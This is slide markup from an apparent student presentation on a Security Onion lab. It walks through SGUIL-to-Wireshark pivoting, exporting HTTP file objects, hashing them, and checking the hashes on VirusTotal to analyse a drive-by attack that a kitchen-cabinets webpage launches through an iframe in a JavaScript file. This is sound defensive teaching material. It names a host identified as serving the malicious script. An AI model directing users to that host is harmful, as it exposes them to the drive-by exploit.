          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="4381500"/>
            <a:ext cx="8820849" cy="5341141"/>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154237" y="3103530"/>
            <a:ext cx="17703160" cy="7042569"/>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Repeat the pervious steps for  alert ID 5.24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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After saving the file for  alert ID 5.2  , redo the steps again to 5.24 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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pivot from SGUIL to Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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Investigate HTTP Traffic : </a:t>
            </a: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apply http.request filter and then expand  the Hypertext Transfer Protocol application layer</a:t>
            </a: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lvl="2">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pP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	As shown in HTTP app layer  that http request for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>JavaScript file that is named dle_js.js</a:t>
            </a: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 And the host server is 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>retrotip.visionurbana.com.ve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">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	 3. finally save the file object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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151043"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INVESTIGATE  USING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WIRESHARK </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect r="27684"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3391432" y="4674942"/>
            <a:ext cx="11228769" cy="350895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154237" y="3103530"/>
            <a:ext cx="17703160" cy="2207912"/>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Repeat the pervious steps for   alert ID 5.25 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">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redo the steps for 5.25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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Pivot from SGUIL to Wireshark</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>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Investigate HTTP Traffic </a:t>
            </a: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	3.   Finally save the file object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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151043"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INVESTIGATE  USING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WIRESHARK </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154237" y="6824767"/>
            <a:ext cx="4593924" cy="1836015"/>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View the downloaded files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">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we can see the downloaded 	files in Home directory 	which I saved  as shown in  	the figure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5199618" y="5416160"/>
            <a:ext cx="12323949" cy="3898387"/>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217147" y="2547956"/>
            <a:ext cx="17694195" cy="4439292"/>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What is Hashing:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Hashing is a process that transforms input data of any size into a fixed-length string of characters. The result, known as a hash, 	Hashing is commonly used for data integrity verification, password storage, and digital  signatures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pP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HOW - we can use the </a:t>
            </a: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sha256sum filename </a:t>
            </a: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command in Linux to create hash for file</a:t>
            </a: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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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	</a:t>
            </a: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for example : </a:t>
            </a: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sha256sum filename.txt </a:t>
            </a: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the output is </a:t>
            </a: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3a6eb3be781ec356e68fdc31e9125418b5cb7dff628845289b9e1863959f3d4a </a:t>
            </a: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342900" indent="-342900">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What is the Virus-Total:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	VirusTotal is an online service that scans files and URLs using multiple antivirus engines to detect malware and other threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 It helps  identify malicious content and provides security reports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 it use digital signature to identify the virus </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	 by comparing hashes together.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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543779"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USING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HASHING AND VIRUS-TOTAL </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9829800" y="5933828"/>
            <a:ext cx="7086600" cy="383002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217147" y="2547956"/>
            <a:ext cx="17694195" cy="5554982"/>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Creating Hash for the files :</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Appling command sha1sum on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>SeaMonkey</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file to get its hash. As shown the hash of files is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>97a8033303692f9b7618056e49a24470525f7290</a:t>
            </a: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Also create for other files </a:t>
            </a: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543779"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USING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HASHING AND VIRUS-TOTAL </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect b="19561"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057399" y="4042641"/>
            <a:ext cx="13752287" cy="2846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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect t="4468" b="1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267856" y="8066727"/>
            <a:ext cx="13752287" cy="1436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gs>
            <a:gs pos="100000">
              <a:srgbClr val="050417"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="2700000" scaled="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3170040" y="2388184"/>
            <a:ext cx="6412371" cy="5510631"/>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16" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1914666" y="1886950"/>
            <a:ext cx="11058666" cy="6513099"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1185991" cy="698500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1185991" cy="698500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1185991" h="698500">
                  <a:moveTo>
                    <a:pt x="1185991" y="349250"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="982791" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="349250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982791" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1185991" y="349250"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect r="-4703"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 18"/>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9" name="TextBox 19"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11237490" y="1447114"/>
            <a:ext cx="4569056" cy="9410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TEAM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9692389" y="3121609"/>
            <a:ext cx="7998093" cy="5513070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>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•Hassan Mahmoud Madkour • Ahmed Gomaa Hamed</a:t>
            </a:r>
          </a:p>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 fady maged sabry</a:t>
            </a:r>
          </a:p>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 Zakaria Yousri Zakaria</a:t>
            </a:r>
          </a:p>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 Mariam Mohamed Fawzy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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217147" y="2547956"/>
            <a:ext cx="17694195" cy="4439292"/>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Scanning using VirusTotal:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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gn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:ea typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:cs typeface="Canva Sans" panose="020B0503030501040103"/>
                <a:sym typeface="Canva Sans" panose="020B0503030501040103"/>
              </a:rPr>
              <a:t>	</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Write the hash in search bar to know if the file is malicious or not. In our case we found 35 vendor say that it is a malicious </a:t>
            </a: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543779"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USING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Abadi" panose="020B0604020104020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HASHING AND VIRUS-TOTAL </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="3456679"/>
            <a:ext cx="11243056" cy="6342025"/>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317868" y="1076325"/>
            <a:ext cx="9995433" cy="6463308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CCFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Examine Exploit Artifacts</a:t>
            </a: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marL="571500" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Overview of the exploit analysis using exported documents from Wireshark.</a:t>
            </a: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8" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679594" y="5339030"/>
            <a:ext cx="16930215"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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When the user visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n the remodeling-your-kitchen-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cabinets.html,it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> load java script file which inside it the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that take the user to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>websit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that it malicious.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="3200" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ar-EG" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In this part, you will examine some of the documents that your exported from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wireshark.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Abadi" panose="020B0604020104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317868" y="1076325"/>
            <a:ext cx="9995433" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="33CCFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Examine Exploit Artifacts</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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552392" y="2549627"/>
            <a:ext cx="17694195" cy="9363717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a. In Security Onion, open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>remodeling-your-kitchen-cabinets.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> using your choice of text editor. This webpage initiated the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="40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342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> Open the file in a text editor to identify </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>malicious components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="ECECEC"/>
              </a:solidFill>
              <a:latin typeface="ui-sans-serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>The webpage initiates </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t>drive-by attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="ECECEC"/>
                </a:solidFill>
                <a:latin typeface="ui-sans-serif"/>
              </a:rPr>
              <a:t> that led to the exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
